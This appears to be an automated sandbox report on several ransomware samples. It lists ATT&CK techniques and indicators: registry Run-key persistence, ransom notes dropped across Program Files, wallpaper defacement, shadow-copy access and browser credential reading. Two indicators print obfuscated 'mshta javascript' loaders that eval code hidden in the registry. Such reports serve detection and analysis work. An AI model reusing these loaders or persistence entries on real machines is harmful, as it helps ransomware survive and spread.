1216	Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe
1732	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
1732	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
1732	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2348	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
2348	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
2348	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\{97CE6859-7802-8903-99FB-A8E4A2A676B6} = "C:\\Users\\Admin\\AppData\\Roaming\\Gaxe\\anli.exe"	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\mebatkpwihbm = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\kugvwgbsmmic.exe\""	kugvwgbsmmic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:r8SWqYkp8Z=\"yt\";i27S=new%20ActiveXObject(\"WScript.Shell\");mtddNQp6=\"Swo\";WToy22=i27S.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\npzlo\\\\uhlmbbrw\");wk2CTgqK5V=\"5\";eval(WToy22);SrCS93Te=\"xtMwg4qK1o\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:ywREy2Qf5=\"N1Htj\";jP0=new%20ActiveXObject(\"WScript.Shell\");usue4I2EE=\"4lO\";x7XLX4=jP0.RegRead(\"HKCU\\\\software\\\\npzlo\\\\uhlmbbrw\");PwKAD52Gxz=\"Uk\";eval(x7XLX4);ox2kpKJg=\"G\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\jhjwwpa = "C:\\Windows\\SYSTEM32\\CMD.EXE /C START C:\\Windows\\khatelpdxqwo.exe"	khatelpdxqwo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\vdiaajoqwpey = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\hbtwdghtnrjw.exe\""	hbtwdghtnrjw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\fdilank = "C:\\Windows\\system32\\CMD.EXE /c start C:\\Windows\\ocenlufjyvdi.exe"	ocenlufjyvdi.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\umwxfcm = "C:\\Windows\\SYSTEM32\\CMD.EXE /C START C:\\Windows\\fjyvdiaajoqw.exe"	fjyvdiaajoqw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\AS2014 = "C:\\ProgramData\\dn39Dr3g\\dn39Dr3g.exe"	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\ebdc03\\215619.lnk\""	regsvr32.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
328	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	regsvr32.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 4 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\lukitus.bmp"	HEUR-Trojan-Ransom.Win32.Locky.vho-c6bb72e0a48fcf77920ddc48dd799f04a73ca287f56afb3dd5709725a67e8564.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\lukitus.bmp"	Trojan-Ransom.Win32.Cryptor.asv-826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\lukitus.bmp"	Trojan-Ransom.Win32.Cryptor.agg-8e68f65eb8f0e02cf203c31d8cbb5e5c30bc78e06d77272b4493ca1c97fc048d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpEBC6.bmp"	HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
1044	Dwm.exe
1044	Dwm.exe
1044	Dwm.exe
1068	taskhost.exe
1068	taskhost.exe
1068	taskhost.exe
1068	taskhost.exe
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
2948	anli.exe
2840	DllHost.exe
2840	DllHost.exe
2840	DllHost.exe
2948	anli.exe
1276	vssadmin.exe
2948	anli.exe
1276	vssadmin.exe
2948	anli.exe
1276	vssadmin.exe
1880	WMIC.exe
2216	WMIC.exe
1880	WMIC.exe
2216	WMIC.exe
1880	WMIC.exe
2216	WMIC.exe
2748	DllHost.exe
2748	DllHost.exe
2748	DllHost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
1204	conhost.exe
1204	conhost.exe
1204	conhost.exe
2348	conhost.exe
2348	conhost.exe
2348	conhost.exe
2640	mshta.exe
2640	mshta.exe
2640	mshta.exe
568	conhost.exe
568	conhost.exe
568	conhost.exe
2572	DllHost.exe
2572	DllHost.exe
2572	DllHost.exe
2256	DllHost.exe
2256	DllHost.exe
2256	DllHost.exe
892	DllHost.exe
892	DllHost.exe
892	DllHost.exe
204	DllHost.exe
204	DllHost.exe
204	DllHost.exe
2976	iexplore.exe
2976	iexplore.exe
2976	iexplore.exe
1668	NOTEPAD.EXE
1668	NOTEPAD.EXE
1668	NOTEPAD.EXE
2696	DllHost.exe

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 2124 set thread context of 2844	2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe	102
PID 1096 set thread context of 2948	1096	anli.exe	106
PID 2428 set thread context of 2704	2428	HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe	119
PID 1216 set thread context of 2760	1216	Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe	142
PID 1732 set thread context of 2260	1732	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe	149
PID 2724 set thread context of 1004	2724	Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe	155
PID 2780 set thread context of 2528	2780	Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe	159
PID 1612 set thread context of 3348	1612	kugvwgbsmmic.exe	176
PID 2348 set thread context of 2784	2348	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe	180
PID 328 set thread context of 3564	328	powershell.exe	177
PID 3564 set thread context of 3780	3564	regsvr32.exe	181
PID 2056 set thread context of 3940	2056	khatelpdxqwo.exe	182

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\_ReCoVeRy_+xqdbu.txt	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bs\_ReCoVeRy_+xqdbu.png	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ks_IN\_RECoVERY_+dxqdb.txt	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\_RECoVERY_+dxqdb.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_ButtonGraphic.png	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\SystemV\_RECoVERY_+dxqdb.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\localizedStrings.js	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\_RECoVERY_+dxqdb.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\am\Recovery+ceksj.txt	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\_RECoVERY_+dxqdb.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Windows Sidebar\_RECoVERY_+dxqdb.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\css\_ReCoVeRy_+xqdbu.png	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\_RECoVERY_+dxqdb.html	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl-hot.png	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.jpg	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\_ReCoVeRy_+xqdbu.png	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\_ReCoVeRy_+cpvxr.txt	khatelpdxqwo.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\Recovery+ceksj.txt	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\DVD Maker\ja-JP\Recovery+ceksj.txt	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\Recovery+ceksj.html	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ar\Recovery+ceksj.html	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\Recovery+ceksj.png	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\_ReCoVeRy_+cpvxr.txt	khatelpdxqwo.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\en-US\_ReCoVeRy_+cpvxr.png	khatelpdxqwo.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\_ReCoVeRy_+xqdbu.txt	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\drag.png	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_bezel.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\_RECoVERY_+dxqdb.html	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sl\_RECoVERY_+dxqdb.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\_ReCoVeRy_+xqdbu.html	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\_ReCoVeRy_+cpvxr.txt	khatelpdxqwo.exe
File opened for modification	C:\Program Files\Common Files\System\ado\fr-FR\_ReCoVeRy_+xqdbu.png	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\_RECoVERY_+dxqdb.txt	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\flyout.css	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pl\_RECoVERY_+dxqdb.html	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\mai\Recovery+ceksj.txt	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\js\RSSFeeds.js	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\css\settings.css	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\_ReCoVeRy_+cpvxr.txt	khatelpdxqwo.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotsdarkoverlay.png	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\reflect.png	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_SelectionSubpicture.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_s.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\_ReCoVeRy_+cpvxr.txt	khatelpdxqwo.exe
File opened for modification	C:\Program Files\DVD Maker\de-DE\Recovery+ceksj.png	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\settings.css	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\nn\_ReCoVeRy_+xqdbu.html	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\gui\_ReCoVeRy_+xqdbu.html	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\css\cpu.css	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\25.png	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\_ReCoVeRy_+cpvxr.html	khatelpdxqwo.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\drag.png	khatelpdxqwo.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\js\_ReCoVeRy_+xqdbu.html	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\_ReCoVeRy_+cpvxr.png	khatelpdxqwo.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\css\calendar.css	ocenlufjyvdi.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\keystore\_ReCoVeRy_+cpvxr.html	khatelpdxqwo.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\_RECoVERY_+dxqdb.txt	hbtwdghtnrjw.exe
File opened for modification	C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\ja-JP\Recovery+ceksj.png	kugvwgbsmmic.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ie\Recovery+ceksj.html	kugvwgbsmmic.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File created	C:\Windows\kugvwgbsmmic.exe	Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe
File opened for modification	C:\Windows\khatelpdxqwo.exe	Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe
File opened for modification	\??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\sc_reader.exe	Explorer.EXE
File created	C:\Windows\hbtwdghtnrjw.exe	Trojan-Ransom.Win32.Bitman.lli-c1f58f6b35fba846df52983a880afa4aea441e19b446c753eff7da1a942c09ca.exe
File created	C:\Windows\ocenlufjyvdi.exe	Trojan-Ransom.Win32.Bitman.noi-73a2ed1606f22e828554948d7f79dd99f2858bc3465e5065abcbf90d98583b3c.exe
File created	C:\Windows\fjyvdiaajoqw.exe	Trojan-Ransom.Win32.Bitman.qkb-0f7b56a20b8b81412d2ad1f9b80ee6002f6875105f546a7a8404a43ed73b1ef4.exe
File opened for modification	C:\Windows\kugvwgbsmmic.exe	Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe
File created	C:\Windows\khatelpdxqwo.exe	Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe
File opened for modification	C:\Windows\hbtwdghtnrjw.exe	Trojan-Ransom.Win32.Bitman.lli-c1f58f6b35fba846df52983a880afa4aea441e19b446c753eff7da1a942c09ca.exe
File opened for modification	C:\Windows\ocenlufjyvdi.exe	Trojan-Ransom.Win32.Bitman.noi-73a2ed1606f22e828554948d7f79dd99f2858bc3465e5065abcbf90d98583b3c.exe
File opened for modification	C:\Windows\fjyvdiaajoqw.exe	Trojan-Ransom.Win32.Bitman.qkb-0f7b56a20b8b81412d2ad1f9b80ee6002f6875105f546a7a8404a43ed73b1ef4.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kugvwgbsmmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTEPAD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Cryptor.asv-826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	khatelpdxqwo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	khatelpdxqwo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTEPAD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTEPAD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTEPAD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Locky.vho-c6bb72e0a48fcf77920ddc48dd799f04a73ca287f56afb3dd5709725a67e8564.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Bitman.noi-73a2ed1606f22e828554948d7f79dd99f2858bc3465e5065abcbf90d98583b3c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kugvwgbsmmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Bitman.lli-c1f58f6b35fba846df52983a880afa4aea441e19b446c753eff7da1a942c09ca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Cryptor.agg-8e68f65eb8f0e02cf203c31d8cbb5e5c30bc78e06d77272b4493ca1c97fc048d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Bitman.qkb-0f7b56a20b8b81412d2ad1f9b80ee6002f6875105f546a7a8404a43ed73b1ef4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hbtwdghtnrjw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ocenlufjyvdi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fjyvdiaajoqw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3548	PING.EXE

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral1/files/0x0006000000019279-276.dat	nsis_installer_1
behavioral1/files/0x0006000000019279-276.dat	nsis_installer_2
behavioral1/files/0x000600000001926a-188.dat	nsis_installer_1
behavioral1/files/0x000600000001926a-188.dat	nsis_installer_2

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1276	vssadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2564	taskkill.exe

Modifies Control Panel 8 IoCs

evasion

description	ioc	Process
